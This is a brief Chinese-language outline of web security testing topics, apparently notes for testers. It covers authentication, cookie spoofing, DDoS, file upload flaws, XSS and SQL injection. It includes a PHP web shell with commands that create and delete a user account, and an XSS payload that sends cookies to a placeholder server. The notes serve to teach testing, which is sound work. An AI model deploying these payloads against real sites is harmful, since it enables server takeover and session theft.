安全测试

从4方面考虑

1.认证与授权

1.1认证

1.2权限

1.3避免未经授权的页面可以直接访问

2.session与cookie

通过抓包工具或者F12查看

2.1session与cookie欺骗

2.2防止作用域为根目录

3.ddos拒绝服务攻击

意思就是疯狂地向服务器发送请求，导致服务器崩溃

3.1使用肉鸡

3.2攻击联盟

4.文件上传漏洞

4.1比如：创建一个后缀为.PHP的文件，代码为   <?php phpinfo( );?>   若有漏洞，会将服务器的情况展现出来

4.2 在输入框输入 <?php system($_GET['cmd']);?>    保存成功后刷洗页面，在URL地址后面输入？cmd=dir  ;   dir  a;   net user hello/add;  net user hello/delet;

5.XSS跨站攻击

cross site script ,即往web页面插入恶意HTML代码，当用户浏览该页时，嵌入其中的代码被执行，

以下是进行跨站攻击使用的一些脚本

<input type="button"    value="点我"   onclick="alert('你好')" />

<input type="button"    value="点我"   onclick="alert(document.cookie)" />       此时的cookie读取了但未保存

<input type="button"    value="点我"   onclick="location.href='http://服务器地址/cookie.php?cookie='+docunment.cookie"/ > 

6.sql注入

https://www.cnblogs.com/imyalost/p/8243128.html